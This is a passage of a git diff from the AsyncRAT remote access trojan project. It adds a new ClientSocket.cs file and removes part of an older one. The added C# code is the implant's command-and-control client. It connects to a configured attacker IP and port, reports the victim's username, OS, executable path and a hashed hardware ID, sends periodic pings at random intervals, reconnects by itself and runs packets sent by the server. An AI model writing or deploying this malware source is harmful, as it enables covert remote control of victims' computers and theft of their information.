- catch { }
- }
-
- public static void Ping(object obj)
- {
- MsgPack msgpack = new MsgPack();
- msgpack.ForcePathObject("Packet").AsString = "Ping";
- msgpack.ForcePathObject("Message").AsString = DateTime.Now.ToLongTimeString().ToString();
- BeginSend(msgpack.Encode2Bytes());
- }
-
- /// Send
- /// adding the buffersize in the beginning of the stream
- public static void BeginSend(byte[] buffer)
- {
- lock (SendSync)
- {
- if (Client.Connected)
- {
- try
- {
- using (MemoryStream MS = new MemoryStream())
- {
- byte[] buffersize = Encoding.UTF8.GetBytes(buffer.Length.ToString() + Strings.ChrW(0));
- MS.Write(buffersize, 0, buffersize.Length);
- MS.Write(buffer, 0, buffer.Length);
-
- Client.Poll(-1, SelectMode.SelectWrite);
- Client.BeginSend(MS.ToArray(), 0, (int)(MS.Length), SocketFlags.None, EndSend, null);
- }
- }
- catch
- {
- Reconnect();
- }
- }
- }
- }
-
- public static void EndSend(IAsyncResult ar)
- {
- try
- {
- Client.EndSend(ar);
- }
- catch
- {
- Reconnect();
- }
- }
+ }
}
}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Client/Sockets/ClientSocket.cs b/AsyncRAT-C#/Client/Sockets/ClientSocket.cs
new file mode 100644
index 0000000..c2a5bbd
--- /dev/null
+++ b/AsyncRAT-C#/Client/Sockets/ClientSocket.cs
@@ -0,0 +1,225 @@
+using Client.MessagePack;
+using Microsoft.VisualBasic;
+using Microsoft.VisualBasic.Devices;
+using System;
+using System.Diagnostics;
+using System.IO;
+using System.Net.Sockets;
+using System.Text;
+using System.Threading;
+using System.Security.Cryptography;
+using Client.Handle_Packet;
+
+namespace Client.Sockets
+{
+
+ class ClientSocket
+ {
+
+ public static Socket Client { get; set; }
+ private static byte[] Buffer { get; set; }
+ private static long Buffersize { get; set; }
+ private static bool BufferRecevied { get; set; }
+ private static Timer Tick { get; set; }
+ private static MemoryStream MS { get; set; }
+ private static object SendSync { get; set; }
+
+ /// Initialization variables and connect to socket.
+ public static void InitializeClient()
+ {
+ try
+ {
+ Client = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
+ {
+ ReceiveBufferSize = 50 * 1024,
+ SendBufferSize = 50 * 1024,
+ ReceiveTimeout = -1,
+ SendTimeout = -1,
+ };
+ Client.Connect(Settings.IP, Settings.Port);
+ Debug.WriteLine("Connected!");
+ Buffer = new byte[1];
+ Buffersize = 0;
+ BufferRecevied = false;
+ MS = new MemoryStream();
+ SendSync = new object();
+ BeginSend(SendInfo());
+ TimerCallback T = CheckServer;
+ Tick = new System.Threading.Timer(T, null, new Random().Next(30 * 1000, 60 * 1000), new Random().Next(30 * 1000, 60 * 1000));
+ Client.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, ReadServertData, null);
+ }
+ catch
+ {
+ Debug.WriteLine("Disconnected!");
+ Thread.Sleep(new Random().Next(1 * 1000, 6 * 1000));
+ Reconnect();
+ }
+ }
+
+ /// Cleanup everything and start to connect again.
+ public static void Reconnect()
+ {
+ if (Client.Connected) return;
+
+ Tick?.Dispose();
+
+ try
+ {
+ Client?.Close();
+ Client?.Dispose();
+ }
+ catch { }
+
+ MS?.Dispose();
+
+ InitializeClient();
+ }
+
+ /// Method to send our ID to server's listview.
+ private static byte[] SendInfo()
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "ClientInfo";
+ msgpack.ForcePathObject("HWID").AsString = HWID();
+ msgpack.ForcePathObject("User").AsString = Environment.UserName.ToString();
+ msgpack.ForcePathObject("OS").AsString = new ComputerInfo().OSFullName.ToString() + " " + Environment.Is64BitOperatingSystem.ToString().Replace("True", "64bit").Replace("False", "32bit");
+ msgpack.ForcePathObject("Path").AsString = Process.GetCurrentProcess().MainModule.FileName;
+ return msgpack.Encode2Bytes();
+ }
+
+ private static string HWID()
+ {
+ StringBuilder sb = new StringBuilder();
+ sb.Append(Environment.UserDomainName);
+ sb.Append(Environment.UserName);
+ sb.Append(Environment.MachineName);
+ sb.Append(Environment.Version);
+ return GetHash(sb.ToString());
+ }
+
+ private static string GetHash(string strToHash)
+ {
+ MD5CryptoServiceProvider md5Obj = new MD5CryptoServiceProvider();
+ byte[] bytesToHash = Encoding.ASCII.GetBytes(strToHash);
+ bytesToHash = md5Obj.ComputeHash(bytesToHash);
+ StringBuilder strResult = new StringBuilder();
+ foreach (byte b in bytesToHash)
+ strResult.Append(b.ToString("x2"));
+ return strResult.ToString().Substring(0, 12).ToUpper();
+ }
+
+ /// get the length of the buffer by reading byte by byte [1]
+ /// until we get the full size.
+ public static void ReadServertData(IAsyncResult ar)
+ {
+ try
+ {
+ if (Client.Connected == false)
+ {
+ Reconnect();
+ return;
+ }
+
+ int Recevied = Client.EndReceive(ar);
+
+ if (Recevied > 0)
+ {
+
+ if (BufferRecevied == false)
+ {
+ if (Buffer[0] == 0)
+ {
+ Buffersize = Convert.ToInt64(Encoding.UTF8.GetString(MS.ToArray()));
+ Debug.WriteLine("/// Buffersize: " + Buffersize.ToString() + "Bytes ///");
+ MS.Dispose();
+ MS = new MemoryStream();
+ if (Buffersize > 0)
+ {
+ Buffer = new byte[Buffersize - 1];
+ BufferRecevied = true;
+ }
+ }
+ else
+ {
+ MS.Write(Buffer, 0, Buffer.Length);
+ }
+ }
+ else
+ {
+ MS.Write(Buffer, 0, Recevied);
+ if (MS.Length == Buffersize)
+ {
+ ThreadPool.QueueUserWorkItem(HandlePacket.Read, MS.ToArray());
+ MS.Dispose();
+ MS = new MemoryStream();
+ Buffer = new byte[1];
+ Buffersize = 0;
+ BufferRecevied = false;
+ }
+ else
+ {
+ Buffer = new byte[Buffersize - MS.Length];
+ }
+ }
+ Client.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, ReadServertData, null);
+ }
+ else
+ {
+ Reconnect();
+ }
+ }
+ catch
+ {
+ Reconnect();
+ }
+ }
+
+ /// Send
+ /// adding the buffersize in the beginning of the stream
+ public static void BeginSend(byte[] buffer)
+ {
+ lock (SendSync)
+ {
+ if (Client.Connected)
+ {
+ try
+ {
+ using (MemoryStream MS = new MemoryStream())
+ {
+ byte[] buffersize = Encoding.UTF8.GetBytes(buffer.Length.ToString() + Strings.ChrW(0));
+ MS.Write(buffersize, 0, buffersize.Length);
+ MS.Write(buffer, 0, buffer.Length);
+
+ Client.Poll(-1, SelectMode.SelectWrite);
+ Client.BeginSend(MS.ToArray(), 0, (int)(MS.Length), SocketFlags.None, EndSend, null);
+ }
+ }
+ catch
+ {
+ Reconnect();
+ }
+ }
+ }
+ }
+
+ public static void EndSend(IAsyncResult ar)
+ {
+ try
+ {
+ Client.EndSend(ar);
+ }
+ catch
+ {
+ Reconnect();
+ }
+ }
+
+ public static void CheckServer(object obj)
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "Ping";
+ msgpack.ForcePathObject("Message").AsString = DateTime.Now.ToLongTimeString().ToString();
+ ClientSocket.BeginSend(msgpack.Encode2Bytes());
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Client/app.config b/AsyncRAT-C#/Client/app.config
new file mode 100644
index 0000000..e2a5a18
--- /dev/null
+++ b/AsyncRAT-C#/Client/app.config
@@ -0,0 +1,3 @@
+
+
+